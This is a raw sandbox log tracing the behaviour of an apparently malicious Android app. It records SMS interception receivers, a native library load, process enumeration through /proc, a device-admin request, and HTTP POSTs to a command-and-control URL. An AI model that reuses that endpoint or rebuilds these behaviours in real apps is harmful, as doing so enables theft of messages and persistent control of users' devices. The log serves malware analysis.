D/S4URC   ( 2323): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.HttpURLConnection]
D/S4URC   ( 2323): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.internal.http.HttpURLConnectionImpl]
D/S4URC   ( 2323): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.Socket]
D/S4URC   ( 2323): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.telephony.TelephonyManager]
D/S4URC   ( 2323): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Debug]
D/S4URC   ( 2323): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.hardware.SensorManager]
D/S4URC   ( 2323): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.res.ResourcesKey]
D/S4URC   ( 2323): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.ResourcesManager]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/app/hiknv.noshxwegp.ewijrcskba-1/base.apk]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/hiknv.noshxwegp.ewijrcskba]
D/S4URC   ( 2323): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/hiknv.noshxwegp.ewijrcskba/cache]
D/S4URC   ( 2323): [SDK] [java.io.File] [mkdirs] [FilePath][String] [/data/data/hiknv.noshxwegp.ewijrcskba/cache]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/hiknv.noshxwegp.ewijrcskba/cache]
D/S4URC   ( 2323): [SDK] [java.lang.Runtime] [loadLibrary] [SoPath][String] [Tsdchyp]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/app/hiknv.noshxwegp.ewijrcskba-1/lib/arm]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/app/hiknv.noshxwegp.ewijrcskba-1/lib/arm/libTsdchyp.so]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/hiknv.noshxwegp.ewijrcskba]
D/S4URC   ( 2323): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/hiknv.noshxwegp.ewijrcskba/files]
D/S4URC   ( 2323): [SDK] [java.io.File] [mkdirs] [FilePath][String] [/data/data/hiknv.noshxwegp.ewijrcskba/files]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/hiknv.noshxwegp.ewijrcskba/files]
D/S4URC   ( 2323): [SDK] [java.io.File] [listFiles] [FilePath][String] [/data/data/hiknv.noshxwegp.ewijrcskba/files]
D/S4URC   ( 2323): [SDK] [java.io.File] [list] [FilePath][String] [/data/data/hiknv.noshxwegp.ewijrcskba/files]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/hiknv.noshxwegp.ewijrcskba]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/hiknv.noshxwegp.ewijrcskba/shared_prefs]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/hiknv.noshxwegp.ewijrcskba/shared_prefs/file.xml]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/hiknv.noshxwegp.ewijrcskba/shared_prefs/file.xml.bak]
D/S4URC   ( 2323): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/hiknv.noshxwegp.ewijrcskba/shared_prefs/file.xml]
D/S4URC   ( 2323): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][file.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2323): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/hiknv.noshxwegp.ewijrcskba/shared_prefs/file.xml.bak]
D/S4URC   ( 2323): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/hiknv.noshxwegp.ewijrcskba/shared_prefs/file.xml]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/hiknv.noshxwegp.ewijrcskba/shared_prefs/file.xml]
D/S4URC   ( 2323): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][file.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][ilock] [Return][0]
D/S4URC   ( 2323): [SDK] [android.app.Activity][onCrate] [Class][ComponentInfo{hiknv.noshxwegp.ewijrcskba/hiknv.noshxwegp.ewijrcskba.Htkxgyo}]
D/S4URC   ( 2323): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][android.provider.Telephony.SMS_RECEIVED,
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/]
D/S4URC   ( 2323): [SDK] [android.content.Intent] [Constructor] [IntentInfo][String] [android.provider.Telephony.SMS_DELIVER]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/system/priv-app/Mms/Mms.apk]
D/S4URC   ( 2323): [SDK] [android.content.Intent] [Constructor] [IntentInfo][String] [android.provider.Telephony.WAP_PUSH_DELIVER]
D/S4URC   ( 2323): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLMessageDigestJDK$MD5]
D/S4URC   ( 2323): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.HttpHandler]
D/S4URC   ( 2323): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLContextImpl]
D/S4URC   ( 2323): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.KeyManagerFactoryImpl]
D/S4URC   ( 2323): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jcajce.provider.keystore.bc.BcKeyStoreSpi$Std]
D/S4URC   ( 2323): [SDK] [android.app.ActivityManager] [getRunningTasks]
D/S4URC   ( 2323): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLRandom]
D/S4URC   ( 2323): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustManagerFactoryImpl]
D/S4URC   ( 2323): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustedCertificateKeyStoreSpi]
D/S4URC   ( 2323): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jce.provider.PKIXCertPathValidatorSpi]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/misc/keychain/pins]
D/S4URC   ( 2323): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://temusfoie.com/s63ty6kac3e5/index.php]
D/S4URC   ( 2323): [SDK] [java.io.File] [list] [FilePath][String] [/proc]
D/S4URC   ( 2323): [SDK] [java.net] [HttpURLConnection] [Request][Method] [POST] [URL][String] [http://temusfoie.com/s63ty6kac3e5/index.php]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc//cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/1/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/1/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/3/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/3/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/13/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/13/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/14/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/14/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/15/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/15/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/16/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/16/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/17/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/17/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/21/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/21/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/30/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/30/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/32/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/32/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/34/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/34/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/47/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/47/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/49/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/49/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/51/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/51/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/54/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/54/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/55/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/55/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/56/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/56/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/61/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/61/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/95/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/95/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/97/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/97/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/102/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/102/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/103/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/103/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/342/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/342/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/454/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/454/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/500/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/500/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/532/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/532/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/546/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/546/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/574/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/574/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/668/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/668/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/739/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/739/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/772/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/772/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/813/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/813/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/885/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/885/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/954/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/954/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/982/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/982/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/1009/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/1009/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/1040/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/1040/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/1088/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/1088/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/1110/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/1110/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/1180/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/1180/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/1352/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/1352/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/1438/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/1438/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/1476/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/1476/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/1567/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/1567/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/1592/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/1592/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/1623/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/1623/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/1647/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/1647/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/1694/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/1694/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/1781/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/1781/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/1828/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/1828/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/1887/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/1887/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/2183/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/2183/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/2218/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/2218/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/2244/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/2244/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/2266/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/2266/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/2323/cgroup]
D/S4URC   ( 2323): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/2323/cgroup]
D/S4URC   ( 2323): [SDK] [android.app.Activity][onCrate] [Class][ComponentInfo{hiknv.noshxwegp.ewijrcskba/hiknv.noshxwegp.ewijrcskba.Bgpucxodvh}]
D/S4URC   ( 2323): [SDK] [android.content.Intent] [Constructor] [IntentInfo][String] [android.app.action.ADD_DEVICE_ADMIN]
